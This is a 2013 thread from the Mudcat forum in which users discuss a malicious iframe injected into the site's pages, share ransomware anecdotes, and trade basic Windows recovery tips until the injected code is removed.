Subject: RE: Tech: Mudcat Trojan warnings From: Mick Pearce (MCP) Date: 29 Jul 13 - 09:00 PM Just noticed I'm seeing 2345.com and 50bang.org on the main thread index page again. Mick |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Ironmule Date: 30 Jul 13 - 03:36 AM I can't seem to log on. I've just moved and been offline a long while and have to reset my cookies. Several different problems/fixes have been mentioned. I'm still using MS XP and when I get hit with Malware, I use the F8 key during the opening sequence, to get to where I can enter "Safe Mode". From there System Restore lets me reset to before I caught my fleas. Some of the latest malware uses very agressive popups to keep you from seeing your desktop even in safe mode. You can start System Restore but you can't click on anything there because it's hidden. Anyone else been told the FBI had locked them out and they had to pay $200? I now have another "Logon" to my computer. It's called "Jeff's Safety" and if the "Hostage Ware" locks up my normal system, I can log on to the safety persona and use system restore to go back to a safe time before I visited what I thought was an OK site. It's an extra couple seconds and a mouse click of delay when I start the computer, but better than the two weeks I spent fighting the worst of the hostage ware. Jeff Smith |
|
Subject: RE: Tech: Mudcat Trojan warnings From: doc.tom Date: 30 Jul 13 - 05:25 AM I dun do what treewind and grishka suggested byu adding code and it's solved the problem. Kasperski - I love it: now that the windows generic and avg keep missing so much stuff, at least Kasperski flags it up. I like to know when people are watching me. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 30 Jul 13 - 07:37 AM This time the "iframe" statement appears directly in the thread list HTML, at its bottom. It looks as if the aggressor has obtained access to Max's computer, a so-called "back door", and uses it flexibly. A tough opponent indeed. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 01 Aug 13 - 04:52 AM Has Max been informed? He can probably remove the <iframe ...> statement at the bottom of the page immediately, and thus buy us a couple of days rest. I wonder if his cryptic "Worst Idea Ever" thread is related to this one - it would not be surprising. Panic is certainly a bad idea if you have the choice (though there are much worse ideas), but well-advised action is required. Other websites have suffered and warded off similar attacks. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Mick Pearce (MCP) Date: 01 Aug 13 - 04:59 AM Grishka - I sent Max a pm when I first first noticed it was back a couple of days ago. Mick |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jim Carroll Date: 02 Aug 13 - 04:53 AM "Mudcat Trojan warnings" Beware of geeks bearing gifts maybe? Jim Carroll |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 02 Aug 13 - 05:13 AM Jim, good pun (particularly if you invented it). Always look at the bright side of life, as soon as the serious side has been taken care of. I sincerely hope that this is true in this case, but the "iframe" is still there. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Jim Carroll Date: 02 Aug 13 - 05:20 AM Thank you Grishka - all my own work, though heavily borrowed from the Classics Jim Carroll |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Mick Pearce (MCP) Date: 02 Aug 13 - 07:05 AM Grishka - from the Worst Idea Ever thread it seems that Max has some problems of his own at the moment. Sorting out the iframe may be quite low priority just now. Mick |
|
Subject: RE: Tech: Mudcat Trojan warnings From: GUEST,Grishka Date: 02 Aug 13 - 10:01 AM Mick, do you know more than we do? I understood that he did something on his computer or server ("The internet loves folly") which he regretted immediately, and which caused him to backup Mudcat. (I did not understand his phrase "Published by: The Balls to Hit Send Press" - did he have the balls to hit a button labeled "Send Press"??? Further explanation is welcome.) I totally agree with the posts on that thread that his health has top priority, and add my best wishes for him regardless of any computer stuff. However, freeing his computers from intrusion should be considered urgent as well, for many reasons including the risk of being blacklisted. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: Mick Pearce (MCP) Date: 02 Aug 13 - 01:39 PM Grishka - I'm as in the dark about the circumstances as you. I was making an inference from the tone of the other thread that he may have other higher priorities at the moment. In the meantime we take our own precautions. Mick |
|
Subject: RE: Tech: Mudcat Trojan warnings From: maeve Date: 02 Aug 13 - 03:55 PM It's not a computer problem being discussed in the other thread. Patience is advisable as Mick suggests. |
|
Subject: RE: Tech: Mudcat Trojan warnings From: bobad Date: 03 Aug 13 - 01:35 PM It's gone - looks like Max is back to taking care of his baby. |
| Share Thread: |